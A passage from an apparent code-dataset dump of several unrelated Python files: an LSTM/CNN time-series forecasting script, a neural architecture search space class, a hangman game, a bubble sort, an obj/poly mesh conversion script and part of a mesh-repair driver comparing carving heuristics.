'total_len': total_len, 'train_len': train_len, 'sequence': sequence, 'tag_norm': tag_norm,
'col_name_tar': col_name_tar, 'df': df, 'train_loader': train_loader, 'test_loader': test_loader}
def save_net_config(path, net, config_name='net.config'):
""" dump run_config and net_config to the model_folder """
net_save_path = os.path.join(path, config_name)
json.dump(net.config, open(net_save_path, 'w'), indent=4)
print('Network configs dump to %s' % net_save_path)
def save_net(path, net, model_name):
""" dump net weight as checkpoint """
if isinstance(net, torch.nn.DataParallel):
checkpoint = {'state_dict': net.module.state_dict()}
else:
checkpoint = {'state_dict': net.state_dict()}
model_path = os.path.join(path, model_name)
torch.save(checkpoint, model_path)
print('Network model dump to %s' % model_path)
class lstm(nn.Module):
def __init__(self, input_size=5, hidden_size=10, output_size=1):
super(lstm, self).__init__()
# lstm็่พๅ
ฅ #batch,seq_len, input_size
self.hidden_size = hidden_size
self.input_size = input_size
self.output_size = output_size
self.rnn = nn.LSTM(input_size=self.input_size, hidden_size=self.hidden_size, batch_first=True)
self.linear = nn.Linear(self.hidden_size, self.output_size)
def forward(self, x):
out, (hidden, cell) = self.rnn(x)
# x.shape : batch,seq_len,hidden_size , hn.shape and cn.shape : num_layes * direction_numbers,batch,hidden_size
a, b, c = hidden.shape
out = self.linear(hidden.reshape(a * b, c))
return out
class CNNNetwork(nn.Module):
def __init__(self, sequence=3, n_ft=1):
super(CNNNetwork, self).__init__()
self.conv = nn.Conv2d(1, 64, kernel_size=(sequence, 1))
self.relu = nn.ReLU(inplace=True)
self.Linear1 = nn.Linear(64 * n_ft, 50)
self.Linear2 = nn.Linear(50, 1)
def forward(self, x):
x = self.conv(x.unsqueeze(1))
x = self.relu(x)
x = x.flatten(1)
x = self.Linear1(x)
x = self.relu(x)
x = self.Linear2(x)
return x
class TSA_uni():
def __init__(self, model_name, data, flag_print=False, sequence=3, n_ft=1):
super(TSA_uni, self).__init__()
self.model_name = model_name
self.sequence = sequence
def pred(self, data, n_known):
preds = []
labels = []
for i, ind in enumerate(range(n_known, len(data))):
if 'naive' in self.model_name:
yhat = data[ind-1]
elif 'avg' in self.model_name:
yhat = np.mean(data[:n_known])
elif 'mov_win' in self.model_name:
yhat = np.mean(data[ind-self.sequence:ind])
preds.append(yhat)
labels.append(data.tolist()[ind])
return preds, labels
class get_model():
def __init__(self, args, name_model='lstm', lstm_hid_size=10, lr=0.001):
self.args = args
self.name_model = name_model
self.criterion = nn.MSELoss()
if name_model == 'lstm':
self.model = lstm(input_size=args['n_ft'], hidden_size=lstm_hid_size)
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
elif name_model == 'cnn':
self.model = CNNNetwork(sequence=args['sequence'], n_ft=args['n_ft'])
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
elif 'TSA_uni' in name_model:
self.TSA_agent = TSA_uni(model_name=name_model,
data=args['df'][args['col_name_tar']][:args['train_len']],
flag_print=False, sequence=args['sequence'], n_ft=args['n_ft'])
else:
print('Invalid network type')
if 'TSA_uni' not in name_model and torch.cuda.is_available():
self.device = torch.device('cuda:0')
self.model = self.model.to(self.device)
cudnn.benchmark = True
else:
self.device = torch.device('cpu')
def train(self, i_run, n_epochs=200, flag_info=False):
if 'TSA_uni' in self.name_model:
return
if flag_info:
nBatch = len(self.args['train_loader'])
for i in range(n_epochs):
if self.name_model == 'cnn':
self.model.train()
losses = AverageMeter()
data_time = AverageMeter()
total_loss = 0
with tqdm(total=nBatch,
desc='Run #{} Train Epoch #{}'.format(i_run, i + 1)) as t:
end = time.time()
for idx, (data, label) in enumerate(self.args['train_loader']):
data_time.update(time.time() - end)
data, label = data.to(self.device), label.to(self.device)
data1 = data.squeeze(1)
if self.name_model == 'cnn':
pred = self.model(data1)
else:
pred = self.model(Variable(data1))
loss = self.criterion(pred, label)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
total_loss += loss.item()
# measure accuracy and record loss
losses.update(loss.item(), data.size(0))
t.set_postfix({
'loss': losses.avg,
# 'lr': new_lr,
# 'loss_type': loss_type,
'data_time': data_time.avg,
})
t.update(10)
end = time.time()
else:
for i in range(n_epochs):
if self.name_model == 'cnn':
self.model.train()
for idx, (data, label) in enumerate(self.args['train_loader']):
data, label = data.to(self.device), label.to(self.device)
data1 = data.squeeze(1)
if self.name_model == 'cnn':
pred = self.model(data1)
else:
pred = self.model(Variable(data1))
loss = self.criterion(pred, label)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
def test(self):
# ๅผๅงๆต่ฏ
if 'TSA_uni' not in self.name_model:
if self.name_model == 'cnn':
self.model.eval()
preds = []
labels = []
for idx, (x, label) in enumerate(self.args['test_loader']):
x, label = x.to(self.device), label.to(self.device)
x = x.squeeze(1) # batch_size,seq_len,input_size
pred = self.model(x)
preds.extend(pred.data.squeeze(1).tolist())
labels.extend(label.squeeze(1).tolist())
else:
preds, labels = self.TSA_agent.pred(self.args['df'][self.args['col_name_tar']], self.args['train_len'])
# print(len(preds[0:50]))
# print(len(labels[0:50]))
if self.args['tag_norm'] == 'min-max':
res_final = np.sqrt(self.criterion(torch.Tensor(preds), torch.Tensor(labels))) * \
(self.args['tar_max'] - self.args['tar_min'])
print(res_final)
plt.plot(
[ele * (self.args['tar_max'] - self.args['tar_min']) + self.args['tar_min'] for ele in preds[0:50]],
"r", label="pred")
plt.plot(
[ele * (self.args['tar_max'] - self.args['tar_min']) + self.args['tar_min'] for ele in labels[0:50]],
"b", label="real")
elif self.args['tag_norm'] == 'Z-score':
res_final = np.sqrt(self.criterion(torch.Tensor(preds), torch.Tensor(labels))) * self.args['tar_std']
print(res_final)
plt.plot([ele * self.args['tar_std'] + self.args['tar_mean'] for ele in preds[0:50]], "r", label="pred")
plt.plot([ele * self.args['tar_std'] + self.args['tar_mean'] for ele in labels[0:50]], "b", label="real")
elif self.args['tag_norm'] == 'none':
res_final = np.sqrt(self.criterion(torch.Tensor(preds), torch.Tensor(labels)))
print(res_final)
plt.plot([ele for ele in preds[0:50]], "r", label="pred")
plt.plot([ele for ele in labels[0:50]], "b", label="real")
else:
print('Invalid norm type.')
plt.show()
return res_final
def main(args):
all_res = []
os.makedirs(args.save, exist_ok=True)
for i in range(args.iterations):
data_args = get_dataset(file_name=args.file_name, col_name_tar=args.col_name_tar,
flag_multi=args.flag_multi, flag_fuse=args.flag_fuse,
tag_norm=args.tag_norm, train_ratio=args.train_ratio,
trn_batch_size=args.trn_batch_size, vld_batch_size=args.vld_batch_size,
shuffle=args.shuffle)
print('Iter: ', i + 1)
engine = get_model(data_args, name_model=args.name_model, lstm_hid_size=args.lstm_hid_size, lr=args.lr)
engine.train(i_run=i, n_epochs=args.n_epochs, flag_info=True)
res_final = engine.test()
all_res.append(res_final.tolist())
if 'TSA_uni' not in engine.name_model:
save_net(args.save, engine.model, engine.name_model + '-{}'.format(i + 1) + '.pkl')
# ไฟๅญๅพ็ๅฐๆฌๅฐ
plt.savefig(os.path.join(args.save, engine.name_model + '-{}'.format(i + 1) + '_plot.eps'),
format='eps', bbox_inches='tight')
save_path = os.path.join(args.save, args.name_model)
del data_args['train_loader']
del data_args['test_loader']
del data_args['df']
data_args['test_err'] = all_res
data_args['file_name'] = args.file_name
with open(save_path, 'w') as handle:
json.dump(data_args, handle)
print(all_res)
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--file_name', type=str, default='../dataset/_TS/traffic.csv', help='location of data')
parser.add_argument('--col_name_tar', type=str, default='Slowness_in_traffic', help='target feature name')
parser.add_argument('--flag_multi', action='store_true', default=False, help='whether use multiple input features')
parser.add_argument('--flag_fuse', action='store_true', default=False, help='whether fuse input features')
parser.add_argument('--shuffle', action='store_true', default=False, help='whether fuse input features')
parser.add_argument('--tag_norm', type=str, default='min-max', help='Normalization type: none/min-max/Z-score')
parser.add_argument('--train_ratio', type=float, default=2/3, help='The ratio of train samples')
parser.add_argument('--lr', type=float, default=0.001, help='learning rate')
parser.add_argument('--name_model', type=str, default='lstm', help='model name - lstm/cnn/TSA_uni_naive/TSA_uni_avg/TSA_uni_mov_win')
parser.add_argument('--save', type=str, default='pred', help='location of dir to save')
parser.add_argument('--str_time', type=str, default=None, help='time string')
parser.add_argument('--iterations', type=int, default=10, help='number of search iterations')
parser.add_argument('--n_workers', type=int, default=4, help='number of workers for dataloader per evaluation job')
parser.add_argument('--trn_batch_size', type=int, default=12, help='train batch size for training')
parser.add_argument('--vld_batch_size', type=int, default=12, help='test batch size for inference')
parser.add_argument('--n_epochs', type=int, default=200, help='number of epochs for CNN training')
parser.add_argument('--lstm_hid_size', type=int, default=3, help='hidden size of lstm')
cfgs = parser.parse_args()
cfgs.str_time = time.strftime("%Y%m%d-%H%M%S")
cfgs.save = '{}-{}-{}'.format(cfgs.save, cfgs.name_model, cfgs.str_time)
print(cfgs)
main(cfgs)
``` |
{
"source": "Johnzhjw/MOE-DGNAS",
"score": 2
} |
#### File: Johnzhjw/MOE-DGNAS/search_space.py
```python
import torch
import random
import numpy as np
class MacroSearchSpace(object):
def __init__(self, search_space=None, dim_type=None, search_space2=None, dim_type2=None, tag_all=False):
if search_space and dim_type:
self.search_space = search_space
self.dim_type = dim_type
self.search_space2 = search_space2
self.dim_type2 = dim_type2
else:
# Define operators in search space
self.search_space = {
'layer_flag': [False, True],
'attention_type': ["linear", "gen_linear", "cos", "const", "gcn", "gat", "sym-gat"], # "ggcn",
'aggregator_type': ["mean", "sum", "pool_mean", "pool_max", "mlp"], # "gru", "lstm", "none",
'combinator_type': ["mlp", "identity", "none"], # "gru", "lstm", "none", "lstm",
'activate_function': ["linear", "elu", "sigmoid", "tanh",
"relu", "relu6", "softplus", "leaky_relu"],
'number_of_heads': [1, 2, 4, 6, 8, 16], #
'hidden_units': [4, 8, 16, 32, 64, 128],
# 'attention_dim': [4, 8, 16, 32, 64, 128, 256], #
# 'pooling_dim': [4, 8, 16, 32, 64, 128, 256],
# 'feature_dropout_rate': [0.05, 0.6], # [0.05, 0.1, 0.2, 0.3, 0.4, 0.5], #
# 'attention_dropout_rate': [0.05, 0.6], # [0.05, 0.1, 0.2, 0.3, 0.4, 0.5], #
# 'negative_slope': [0.01, 0.49], # [0.05, 0.1, 0.2, 0.3, 0.4, 0.5], #
# 'residual': [False, True],
# 'dropout_rate': [0.2, 0.4, 0.6, 0.8],
'se_layer': [False, True],
}
self.dim_type = [
"bool",
"discrete",
"discrete",
"discrete",
"discrete",
"discrete",
"discrete",
# "discrete",
# "discrete",
# "float",
# "float",
# "float",
# "bool"
# "discrete",
"bool"
]
self.search_space2 = {
# 'weight_decay_rate': [5e-4, 8e-4, 1e-3, 4e-3], # [5e-4, 8e-4, 1e-3, 4e-3], #
# 'learning_rate': [5e-4, 1e-3, 5e-3, 1e-2], # [5e-4, 1e-2], #
'short_cut': [False, True], # [5e-4, 1e-2], #
}
self.dim_type2 = [
# "discrete",
# "discrete",
"bool",
]
if len(self.search_space) != len(self.dim_type):
raise RuntimeError("Wrong Input: unmatchable input lengths")
if len(self.search_space2) != len(self.dim_type2):
raise RuntimeError("Wrong Input2: unmatchable input lengths")
self.action_names = list(self.search_space.keys())
self.action_lens = []
for key in self.action_names:
self.action_lens.append(len(self.search_space[key]))
self.state_num = len(self.search_space)
self.action_names2 = list(self.search_space2.keys())
self.action_lens2 = []
for key in self.action_names2:
self.action_lens2.append(len(self.search_space2[key]))
self.state_num2 = len(self.search_space2)
self.tag_all = tag_all
def get_search_space(self):
return self.search_space
def get_search_space2(self):
return self.search_space2
# Assign operator category for controller RNN outputs.
# The controller RNN will select operators from search space according to operator category.
def generate_action_list(self, num_of_layers=2):
action_list = []
for _ in range(num_of_layers):
for act in self.action_names:
action_list.append(act)
if self.tag_all:
for act in self.action_names2:
action_list.append(act)
return action_list
def generate_solution(self, num_of_layers=2):
lb = self.get_lb(num_of_layers)
ub = self.get_ub(num_of_layers)
solution = []
for vl, vu in zip(lb, ub):
solution.append(random.uniform(vl, vu))
return solution
def generate_action_solution(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
actions = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
actions.append(random.uniform(self.search_space[key][0], self.search_space[key][1]))
else:
ind = (int)(self.action_lens[k] * torch.rand(1))
actions.append(self.search_space[key][ind])
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
actions.append(random.uniform(self.search_space2[key][0], self.search_space2[key][1]))
else:
ind = (int)(self.action_lens2[k] * torch.rand(1))
actions.append(self.search_space2[key][ind])
return actions
def generate_action_solution_4_surrogate(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
actions = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
actions.append(random.uniform(self.search_space[key][0], self.search_space[key][1]))
else:
ind = (int)(self.action_lens[k] * torch.rand(1))
actions.append(ind)
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
actions.append(random.uniform(self.search_space2[key][0], self.search_space2[key][1]))
else:
ind = (int)(self.action_lens2[k] * torch.rand(1))
actions.append(ind)
return np.array(actions).reshape(1, -1)
def generate_action_base(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
actions = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
actions.append(random.uniform(self.search_space[key][0], self.search_space[key][1]))
elif self.dim_type[k] == "bool":
actions.append(True)
else:
if key in ['number_of_heads', 'hidden_units', 'attention_dim', 'pooling_dim']:
ind = (int)(self.action_lens[k] - 1)
else:
ind = (int)(self.action_lens[k] * torch.rand(1))
actions.append(self.search_space[key][ind])
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
actions.append(random.uniform(self.search_space2[key][0], self.search_space2[key][1]))
else:
ind = (int)(self.action_lens2[k] * torch.rand(1))
actions.append(self.search_space2[key][ind])
return actions
def generate_actions_4_solution(self, solution):
state_length = len(solution)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
actions = []
for i in range(state_length):
val = solution[i]
k = i % self.state_num
key = self.action_names[k]
if self.dim_type[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(self.search_space[key][ind])
if self.tag_all:
num_layers = state_length // self.state_num
for k, key in enumerate(self.action_names2):
i = num_layers * self.state_num + k
val = solution[i]
if self.dim_type2[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(self.search_space2[key][ind])
return actions
def generate_surrogate_actions_4_solution(self, solution):
state_length = len(solution)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
actions = []
for i in range(state_length):
val = solution[i]
k = i % self.state_num
key = self.action_names[k]
if self.dim_type[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(ind)
if self.tag_all:
num_layers = state_length // self.state_num
for k, key in enumerate(self.action_names2):
i = num_layers * self.state_num + k
val = solution[i]
if self.dim_type2[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(ind)
return np.array(actions).reshape(1, -1)
def get_lb(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
lb = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
lb.append(self.search_space[key][0])
else:
lb.append(0)
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
lb.append(self.search_space2[key][0])
else:
lb.append(0)
return lb
def get_ub(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
ub = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
ub.append(self.search_space[key][1])
else:
ub.append(self.action_lens[k] - 1e-6)
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
ub.append(self.search_space2[key][1])
else:
ub.append(self.action_lens2[k] - 1e-6)
return ub
def get_last_layer_ind(self, actions):
state_length = len(actions)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise Exception("wrong action length")
maxN_layers = state_length // self.state_num
ind_last_layer = 0
for _ in range(maxN_layers):
tmp_offset = _ * self.state_num
if _ == 0 or actions[tmp_offset] == True:
ind_last_layer = _
return ind_last_layer
def remove_invalid_layer(self, actions):
state_length = len(actions)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise Exception("wrong action length")
maxN_layers = state_length // self.state_num
action_list = []
for _ in range(maxN_layers):
tmp_offset = _ * self.state_num
if _ == 0 or actions[tmp_offset] == True:
for i in range(self.state_num):
if i > 0:
action_list.append(actions[tmp_offset + i])
return action_list
def get_dim_num(self, num_of_layers=2):
nDim = num_of_layers * self.state_num
if self.tag_all:
nDim += self.state_num2
return nDim
def get_varTypes(self, num_of_layers=2):
varTypes_list = []
for _ in range(num_of_layers):
for ty in self.dim_type:
varTypes_list.append(ty)
if self.tag_all:
for ty in self.dim_type2:
varTypes_list.append(ty)
return varTypes_list
def get_layer_num(self, vals):
state_length = len(vals)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
num_layer = state_length // self.state_num
return num_layer
def statistics_solution(self, solutions):
state_length = len(solutions[0])
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
statistics1 = self.search_space
statistics2 = self.search_space2
for key in self.action_names:
statistics1[key] = []
for key in self.action_names2:
statistics2[key] = []
for solution in solutions:
for i in range(state_length):
val = solution[i]
k = i % self.state_num
key = self.action_names[k]
if self.dim_type[k] == "float":
statistics1[key].append(val)
else:
ind = (int)(val)
statistics1[key].append(self.search_space[key][ind])
if self.tag_all:
num_layers = state_length // self.state_num
for k, key in enumerate(self.action_names2):
i = num_layers * self.state_num + k
val = solution[i]
if self.dim_type2[k] == "float":
statistics2[key].append(val)
else:
ind = (int)(val)
statistics2[key].append(self.search_space2[key][ind])
for k, key in enumerate(self.action_names):
if self.dim_type[k] == "float":
statistics1[key].append(val)
else:
ind = (int)(val)
statistics1[key].append(self.search_space[key][ind])
statistics1[key] = []
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
statistics2[key].append(val)
else:
ind = (int)(val)
statistics2[key].append(self.search_space2[key][ind])
statistics2[key] = []
return statistics1, statistics2
``` |
{
"source": "JohnZhong2021/Python-practice-project",
"score": 4
} |
#### File: Python-practice-project/code/04Hangman.py
```python
word_list = ["english", "python", "apple"]
user_input_number = int(input("Please choose a guessing word from number 1-3: "))
word_index = user_input_number - 1
user_guess_letter_total = []
guess_count = 0
while guess_count < 10:
word_guess = list(word_list[word_index])
user_guess_letter = input("Please enter your guessed letter: ")
user_guess_letter_total.append(user_guess_letter)
guess_count += 1
def check_word(word_guess, user_guess_letter_total):
for i in range(len(word_guess)):
if word_guess[i] not in user_guess_letter_total:
word_guess[i] = "*"
return word_guess
print("The guessed word is",''.join(check_word(word_guess, user_guess_letter_total)))
if "*" not in word_guess:
print("\nCongretulations! You win!!!")
break
if guess_count >=10:
print("Sorry, you only have 10 times to guess, better luck next time...")
```
#### File: Python-practice-project/code/10Bubble_sort_algorithm.py
```python
import random
def generate_ramdon_list(n):
L = []
i = 1
while i<=n:
L.append(random.randint(1,n))
i += 1
return L
def bubble_sort(L):
n = len(L)
if n == 1 or n==0:
return L
else:
while n >= 2:
j = 0
while j < n-1:
if L[j] > L[j+1]:
E = L[j+1]
L[j+1] = L[j]
L[j] = E
else:
pass
j += 1
n -= 1
return L
print(bubble_sort(generate_ramdon_list(100)))
``` |
{
"source": "johnzjq/ShrinkRepair",
"score": 3
} |
#### File: obj2poly/obj2poly/obj2polyfolder.py
```python
import os, sys, subprocess
def Main():
obj2poly = "c:\\python27\\python "
path = os.path.dirname(os.path.realpath(__file__))
obj2poly = obj2poly + path + "\\obj2poly.py"
os.chdir(sys.argv[1])
if sys.argv[2] == "obj2poly":
dFiles = []
for f in os.listdir('.'):
if f[-3:] == 'obj':
dFiles.append(f)
if len(dFiles) == 0:
return
for f in dFiles:
fout = f[:-4] + '.poly'
runstr = obj2poly + ' ' + f + ' ' + fout
#print runstr
op = subprocess.call(runstr)
if op.poll():
print op.communicate()
op.terminate()
op.communicate()
elif sys.argv[2] == "poly2obj":
dFiles = []
for f in os.listdir('.'):
if f[-4:] == 'poly':
dFiles.append(f)
if len(dFiles) == 0:
return
for f in dFiles:
fout = f[:-5] + '.obj'
runstr = obj2poly + ' ' + f + ' ' + fout
#print runstr
op = subprocess.call(runstr)
elif sys.argv[2] == "poly2poly":
dFiles = []
for f in os.listdir('.'):
if f[-4:] == 'poly':
dFiles.append(f)
if len(dFiles) == 0:
return
for f in dFiles:
fout = f[:-5] + '.poly'
runstr = obj2poly + ' ' + f + ' ' + fout + ' True'
#print runstr
op = subprocess.call(runstr)
if __name__ == '__main__':
Main()
```
#### File: RepairShrink/RepairShrink/RepairShrink.py
```python
๏ปฟimport os, sys, types
import ModelData, ModelDataFuncs, DecomposeFunc, TetraFunc, CarveFunc
#sys.path.append("..\\..\\obj2poly\obj2poly/")
sys.path.append("D:\\JohnGitHub\\mySVN\\obj2poly\\obj2poly\\")
from ConvProvider import ConvProvider
MIDFILEPATH = "tmpRepairShrink.obj"
#start the repair procedure
#isSemantic is equal to True means the semantics should be handled
#debugControl is used to debug
def do_the_work(inputFilePath, isSemantic, debugControl):
#Init mid files
if os.path.exists(MIDFILEPATH):
os.remove(MIDFILEPATH)
#Init datastructure
ModelDataFuncs.Init()
ModelData.strInputFileName, ext = os.path.splitext(inputFilePath)
#read file
print ("----Processing file----")
print (inputFilePath)
if isSemantic == True:
if os.path.splitext(inputFilePath)[1] == '.obj':
print('WARNING: obj format does not contain semantics')
print('Semantics will be deduced')
print ("Check and tessellate the file...")
#MyCov = ConvProvider()
#MyCov.convert(inputFilePath, MIDFILEPATH, True)
##read a tesselated objfile
#if ModelDataFuncs.reader_obj(MIDFILEPATH) == False:
# raise Exception
if ModelDataFuncs.reader_obj(inputFilePath) == False:
raise Exception
else:
#poly with semantics
try:
if not ModelDataFuncs.reader_poly_with_semantics(inputFilePath):
return
except:
raise ImportError
else:
#preprocess (convert and tessellation)
print ("Check and tessellate the file...")
MyCov = ConvProvider()
MyCov.convert(inputFilePath, MIDFILEPATH, True)
#read a tesselated objfile
if ModelDataFuncs.reader_obj(MIDFILEPATH) == False:
raise Exception
#invert the normal of the input model
if ModelData.global_INVERT_NORMAL:
ModelDataFuncs.invert_poly_normal()
#only for debug
#tmp = ModelData.centerVertex
#ModelData.centerVertex = (0.0, 0.0, 0.0)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CLS.obj")
#ModelData.centerVertex = tmp
#
if int(debugControl) == 1:
print("Mode 1 start...\n")
#Decomposit all the triangles%
DecomposeFunc.model_decompositionEx()
#Merge all the coplaner dictFaces
#coplaner_face_merge()
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_DEC.obj")
elif int(debugControl) == 2:
print("Mode 2 start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#Heuristic carving
CarveFunc.heuristic_tet_carving()
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CARVE.obj")
#Reconstruct the mesh from tetrahedron
TetraFunc.extract_mesh_from_tet(isSemantic)
#Output
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT.obj")
if isSemantic:
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
elif int(debugControl) == 3:
print("Mode 3 start...\n")
#only deduce the semantics
TetraFunc.deduce_semantics_of_poly(isSemantic)
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
elif int(debugControl) == 4:
print("Mode 4 comparison mode start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#####copy datacopy
ModelDataFuncs.preserveModelData()
#switches = [('dof',0), ('deg', 0), ('volume',0), ('flatness',0),('depth',0), ('distanceToCenter',1), ('directions',0), ('area' ,0), ('level' ,0), ('curvature',0)]
print CarveFunc.globalHeuristic
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_none.obj")
#different combinations
#dof
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['dof'] = 1
print CarveFunc.globalHeuristic
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof.obj")
#dof+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
print CarveFunc.globalHeuristic
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_deg.obj")
CarveFunc.globalHeuristic['deg'] = 0
#dof+volume
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['volume'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_vol.obj")
#dof+volume+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_vol_deg.obj")
CarveFunc.globalHeuristic['volume'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+flatness
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['flatness'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_flat.obj")
#dof+flatness+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_flat_deg.obj")
CarveFunc.globalHeuristic['flatness'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+depth
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['depth'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_depth.obj")
#dof+depth+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_depth_deg.obj")
CarveFunc.globalHeuristic['depth'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+distant
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['distanceToCenter'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist.obj")
#dof+distant+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_deg.obj")
CarveFunc.globalHeuristic['distanceToCenter'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+direction
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['direction'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_direction.obj")
#dof+direction+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_direction_deg.obj")
CarveFunc.globalHeuristic['direction'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+area
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['area'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_area.obj")
#dof+area+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_area_deg.obj")
CarveFunc.globalHeuristic['area'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+level
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['level'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level.obj")
#dof+level+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_deg.obj")
